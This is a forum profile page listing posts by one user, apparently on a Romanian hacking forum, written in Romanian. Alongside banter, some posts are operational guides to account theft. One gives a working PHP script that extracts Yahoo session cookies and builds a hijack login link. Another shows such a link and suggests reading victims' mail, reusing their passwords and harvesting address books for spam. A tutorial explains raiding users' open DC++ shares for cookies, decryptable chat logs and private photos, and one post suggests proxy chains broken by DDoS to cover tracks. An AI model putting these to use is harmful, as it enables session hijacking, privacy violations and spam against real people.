Jump to content

loki

Active Members
  • Posts

    3545
  • Joined

  • Last visited

  • Days Won

    19

Everything posted by loki

  1. loki

    Am revenit

    nu am auzit-o p'asta wb Pana apare hackpedia la loc de asta era vorba: Pentru tot topicul googleste SRI rstzone si il gasesti in cache la primul link.
  2. e o metoda sa afli cine sta pe invizibil: da-i jumatate de ora si te injura de toti mortii pan la Decebal.
  3. loki

    Hackpedia.info

    si ha.ckers disparuse cam in aceeasi perioada pentru scurt timp, cel putin pagina cu xss-uri nu o puteam accesa cand aveam nevoie de ea. Coincidenta...
  4. exista un program similar cu cel pentru mozila: piepr.exe (passscape ie password recovery). Parolele din autocomplete se pastreaza in documents and settings/user/ntuser.dat Il gasiti usor dar nu am dat inca de crack.
  5. ddos? hmm cu pickhammerul daca nu e topor.. speraclu e prea sexy
  6. sa inteleg ca la casa noua primul lucru se verifica incuietoarea cu toporu? Hmm, chiar ma simt ca acasa!
  7. CIP (spectrum, cu paginare 64k)... aaah PC? IBM 486 4M ram 600M HDD Western Digital cu 2 bad-uri care nu au evoluat niciodata. Placa video inclusa, 1 mega (care nu mergea mai sus de 256 culori desi primea 1024x768) A si la scoala, am prins un 286 si un 386 si 2 laboratoare de spectrum-uri
  8. loki

    Am revenit

    eu nu, nu-l stiu Mai intru pe hackpedia pt diverse informatii cum ar fi sa aud ceva de rst zilele astea.
  9. loki

    Am revenit

    oaaah bine am revenit! Mi-a prins bine vacanta, m-am apucat de invatat... Apropo am vazut istoria despre lamerii care "au picat" rstzone pe hackpedia. Acu... de ce nu mai exista hackpedia? Sau compurile de la servici is toate pe DC de nu pot intra acolo?
  10. Nu am testat ca nu am la indemana dar o modalitate utilizata este (citita pe undeva, imi scapa) folosirea unui lant de proxy-uri sub forma proxy1:port proxy2:port ... proxyn:port. Dupa reusita se rupe lantul cu un atac DDOS la unul sau mai multe servere din mijloc. Te mai duci si la mall cu laptopu unde mai ofera si net gratuit wireless si stai la un cartof prajit ca sa te simti mai sigur.
  11. pai un coleg de clasa mi-a explicat ca la clubu elevilor poti controla jucatorii de fotbal pe televizor, eu nu-l credeam. Eram intr-a 5-a imediat dupa revolutie si m-am inscris si io sa vad. Si am inceput cu programe de scris Desteapta-te Romane cu BEEP in Basic pe Spectrum. Apoi Basic cu Z80, mai tarziu Beta-Basic, C si Pascal si etc... In liceu am vazut primul 286. Colegu asta a meu lucreaza acu la Adobe si odata la cativa ani mai stiu ceva de el. pax.nWo mi-a placut la wow cand erau serverele wowemu, lucrai cu Turbo C Library (TCL) pentru scriptat. Frumos sa creezi lucruri deosebite de natura jocului.
  12. interesant, dar nu zi "a lot easier" - click dreapta pe cookie - view as text - click dreapta select all - copy - http://localhost/scriptu.php - paste - click "test cookie link" In rest metoda ta e foarte buna ca acopera si partea de mozila. Nu am testat-o Pentru cei care zice ca "lipsesc" si stiu putin php bagati in cod cate un echo $y." " .$t." "; sa il depanati. Desi codul e destul de simplu de inteles, contine un urlencoder pentru cateva caractere din cookie: & si =. Na deschideti cookie intr-un hex editor si vedeti daca enterul e 0x0a. Nu intotdeauna merge linkul: se poate sa fie expirat cookie-ul. pax.nWo: testat, pune exact scriptul; liniile 16-17 is de modificat pentru fisiere, nu le schimba (ca vad ca nu merge). Apoi deschizi cu notepad cookie si dai copy-paste. Mai trebuie perfectionat.
  13. loki

    Mailuri False

    N-o fi Puskin ca parca lui ii sugerasem ceva asemanator in domeniul extragerii banilor de pe conturi furate
  14. loki

    Trafic WTF

    depinde unde ai blogul, verifica si daca iti executa scriptul cumva, candva am primit eu script cu erori de sintaxa. Daca hostul iti filtreaza scriptul tre sa intrebi adminii de la hostul blogului.
  15. daca nu ai gasit nici un T inseamna ca nu e bun. Nu mai postati, va rog, cookie-uri. Faceti probe pe compul personal si intelegeti. Si credits: RST yahoo cookie grabber pentru metoda, acolo intelegeti mai bine ce e cu Y si T.
  16. Te citez: http:// msg.edit.yahoo.com/config/reset_cookies?.y=Y=v%3D1%26n%3D752pfcp33464i%26l%3D3h6_2h8ij80dwr/o%26p%3Dm1tvvro012000000%26iz%3D087076%26r%3Dhk%26lg%3Den-US%26intl%3Dus&.t=T=z%3DH3OOIBHL2SIB1FiTnIDRHUyMTQwBjYwNTE0MzI3NDc-%26a%3DQAE%26sk%3DDAAALhSQpnS2u3%26ks%3DEAA684dP2j6NAJIeCprrH8eiw--~A%26d%3Dc2wBTmpNM0FURTNNall6TkRVd016QS0BYQFRQUUBZwFiR184clRELjBCWVhHZEhtUXRqSzBnLS0BdGlwAVZsSDFhRAF6egFIM09PSUJBN0U-&.done=http%3A//us.mg1.mail.yahoo.com/ym/login%3Fymv%3D0 Ms pentru cookie (posibil sa mai aiba erori scriptu, eu il testam in mozilla, aici am IE si nu a mers cu ce ai scris). pai nu poti afla parola, dar deobicei o gasesti in mail, unii si-o pun la fel si la alte servicii. Ai acces in contu omului vreo 2 zile, daca nu gasesti nimic interesant cauti altul. Macar salvezi un addressbook, poate in viata faci bani cu spam mails.
  17. Nu ziceam de captcha complicate. Desi... cred ca ai dreptate. Comparatia cu LCD este doar de a nu compara intreaga imagine ci partial. E doar o optimizare, dar deoarece scopul scuza mijloacele, e mai complicat si inutil sa creez optimizarea asta (ma complic singur). Luat un caz de cifre si gandit: - care pixeli exista marcati la cifra 0 si care nu - ... cifra 1... La litere e cam pierdere de timp. Bine e cum am zis, o optimizare prea complicata, ca timp de executie este insesizabila. Is curios de un algoritm de vanat matzele de pe rapidshare (totusi se pare ca se lauda cu un update pe viitor)
  18. Gasesc un singur cookie pe zi valid. Asta doar la useri care bifeaza remember. Ce ai gasit nu-ti foloseste. In coada fisierului cookie tre sa ai * Y v=1&n=00o0... yahoo.com/ 1024 342532096 32065574 2168555376 29934769 * T z=UD/QIBUXm... yahoo.com/ 1024 342532096 32065574 2168555376 29934769 * Si atunci e bun (asta e de ieri). EDIT: e o pustoaica care si-a pus numele ca parola, am sters din cookie sa-i las totusi conturile in pace. Testeaza intai pe tine: da un remember password, ia un cookie yahoo de la tine si incearca sa intri pe mail de pe un alt browser folosind Y si T. Script de extras din cookie yahoo: salvati intr-un fisier cookie.php pe hostul dvs. <?php $link="http://".$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF']; $cookie=$_POST['cookie']; ?> <FORM action=<? echo $link;?> method="post" name="read"> <Label for "cookie">Copy-paste cookie file </label> <textarea name="cookie" height=100></textarea> <INPUT type="submit" value="Send"> </form> <? if($cookie) { $cookietable = explode('*', $cookie); for($i=0;$i<count($cookietable); $i++) { if(($cookietable[$i][2]=='Y')&&($cookietable[$i][5]=='v')) $y=substr($cookietable[$i],5); if(($cookietable[$i][2]=='T')&&($cookietable[$i][5]=='z')) $t=substr($cookietable[$i],5); } $y=explode("yahoo.com",$y); $y=$y[0]; $t=explode("yahoo.com",$t); $t=$t[0]; if($y&&$t) { $y = ereg_replace(';', '',$y); $y = ereg_replace('&', '%26',$y); $y = ereg_replace('=', '%3D',$y); $y = 'Y%3D'.$y; $t = ereg_replace(';', '',$t); $t = ereg_replace('&', '%26',$t); $t = ereg_replace('=', '%3D',$t); $t = 'T%3D'.$t; echo '[url="http://msg.edit.yahoo.com/config/reset_cookies?.y='.$y.'&.t='.$t.'&.done=http%3A//us.mg1.mail.yahoo.com/ym/login%3Fymv%3D0"]Test Cookie Link[/url]'; } else echo "Lipsesc Y sau T."; } ?> Puteti optimiza prin incarcarea fisierului cookie cu un <INPUT type="file"> in acest caz modificati liniile 17-18 cu { if(($cookietable[$i][1]=='Y')&&($cookietable[$i][3]=='v')) $y=substr($cookietable[$i],3); if(($cookietable[$i][1]=='T')&&($cookietable[$i][3]=='z')) $t=substr($cookietable[$i],3); } Asta datorita enter-urilor. La copy paste dintr-un cookie %0A devine %0D%0A. La citirea din fisier, nu.
  19. Pai tocmai ai demonstrat ca merge programul. Dar stii cum ii faza cu "dupa ce rupi picioarele unui purec, el nu mai aude". Ultrasunetele nu o sa creeze efectul din paharul de apa in capul tzantzarilor ca sa-i omoare, ci ii gonesc pentru ca nu le suporta. Cat erau afara poate au evitat sa intre. Cat i-ai lasat inauntru direct in mediu de ultrasunete asta i-a innebunit ca nu mai stiau pe unde sa plece. Aseara am stat si eu la calculator cu programul deschis, imi dau seama ca nu m-a piscat nimeni. Doar ca am inceput eu sa ma dau cu capu de pereti. Pe ce sistem audio ai incercat? Oricum eu am doar 2 boxe ragushite de vreo 8 ani de la primul meu 486.
  20. Un tutorial adresat kinderilor si celor care mai cauta pe DC cate un pitziponc sau o cocalara din plictiseala la servici: Ma saturasem de foldere "fete proaste shereaza pe DC" si ma gandeam sa caut singur sursele Presupunand ca ma plictisesc intr-o zi si vreau sa caut curiozitati pe un hub, hai sa vedem ce face omu pe messenger. Pe scurt: ce e important de agatat de pe un comp care ruleaza yahoo messenger: c:\progra~1\Yahoo!\Messenger\Cache\Icon = pozele folosite ca avatar de-a lungul timpului (cea curenta o gasiti pe http://img.msg.yahoo.com/avatar.php?yids=user c:\progra~1\Yahoo!\Messenger\Cache\Photo Sharing = ramasite de cand userul a schimbat poze prin serviciul photo sharing. c:\progra~1\Yahoo!\Messenger\Profiles = toate conturile care au fost folosite pe messenger. Sub forma: c:\progra~1\Yahoo!\Messenger\Profiles\nume\My Icons\*.png = avatare c:\progra~1\Yahoo!\Messenger\Profiles\nume\Archive\Messages\interlocutor\*.dat = discutii Asta se face cu discheta. Acum multi useri (romani majoritatea) isi scapa la share discul C continand Documents and Settings si Program Files. Pai hai sa profitam putin: Ori bifati ce e in paranteza ori apasati pe "Type" sa le aranjati dupa tip. - Search @yahoo (bifand "documents" = txt) gasiti cookies. Aranjati dupa dimensiune si downloadati cele intre 800 bytes si 1,5K. Deschideti cu notepad si la sfarsit puteti gasi cookie-urile Y si T (Y v=... si T z=...) Puteti fura sesiunea. Odata intrat search dupa "password", "parola" sau daca nu, cautati servicii cu mailuri gen "v-ati inregistrat, nume x parola y" si aveti un cont deoparte. Sau un save la addressbook pentru un eventual spam banos (votati Ludovic Orban! ). - Search Cache Photo Sharing Yahoo. (bifati poze) Yahoo Messenger isi mai pastreaza in cache fisierele transmise prin Photo Sharing. Select All, download, poze, alea alea. Downloadati folderele Photo Sharing sau folderele care incep cu S si au cateva litere (gen S0878). Pozele cu --_t in coada sunt thumbnails, le puteti selecta si downloada pentru a avea o imagine despre cine e online. Pozele cu --_m sunt mai mari. Se gasesc in program files\yahoo!\cache\photo sharing - Search Yahoo Messenger Profiles gasiti lista userilor si foldere cu discutia lor pe mess. Downloadati folderele profiles/nume pentru a putea fura discutii. Contine archive cu interlocutorii (daca a bifat optiunea de salvat discutii) si My Icons cu avatare folosite. Pentru decriptarea discutiilor copiati nume in c:\program files\yahoo!\messenger\profiles\ si folositi yahdecode (google) - Search simplu My Icons pentru o intreaga colectie de avatare (progra~1\yahoo!\messenger\profiles\nume\my icons). Sau cache icon pentru toate avatarele folosite de useri de cand si-a pus messu (progra~1\yahoo!\cache\icon) pe care le redenumiti apoi *.png PS Progra~1=Program Files, lene de taste.
  21. vladiii, acuma macar sunt sigur ca am vb cu tine pe mess (eram 90% da mi se intampla sa ma mai faca friend cate un kenpaki din cand in cand...). Ma gandeam ca de la punctul 2 incolo, la tipul asta de captcha: se poate folosi ceva gen dictionar, iei cifrele din captcha fara sa te intereseze fontul si le pui deoparte, apoi le compari. Pentru optimizarea algoritmului, dorind sa obtii doar un text cu numerele, nu te mai intereseaza sa corespunda 100% cu imaginea, nu faci OCR pe ea. Gasesti doar cateva pozitii ale unor pixeli pentru fiecare cifra in parte si le cauti doar in imaginea din captcha. Ceva cum e LCD-ul: 1 inseamna 2 liniute, restul zero, intelegi! Si in caz ca nu am observat (nu pot citi cod la ora asta): comparatia se face ">culoare fundal" sau "<culoare fundal" si nu "==culoare fixa"
  22. ce sa-i faci, din toate limbile latine din europa romana are cea mai complicata gramatica, restul parca-s orientate similar cu engleza. Mi-e mila de gogle. Tari bancuri, tre sa il spun si pe al 2-lea primei persoane intalnite:)
  23. Doamne, v3ctor propriu de matrice Jordan, da parca tot el a postat din ce zici tu mai sus. Tu vrei sa convingi tzantzarii ca vine sfarsitul lumii in 2012 si sa nu ne mai piste? sau vrei sa-i duci topicul in cosul de gunoi?
  24. vrei sa zici sters sau inchis? Daca intrebi de poze, ai acces, doar sa le stii numele. Ca sa ai acces la nume, da-l cautare pe google: hi5, numarul din adresa userului, etc. Si deschizi din "cached". Daca thumbnail-ul pozei are 01 in coada, pune 02, daca are "small" sterge small si o vezi mare.
  25. Offtopic: daca am vazut ca le iubesti asa de mult, ma pot eu abtine sa nu-ti ofer o utilizare misto? (din toate emoticoncerturile asta imi place mie)
×
×
  • Create New...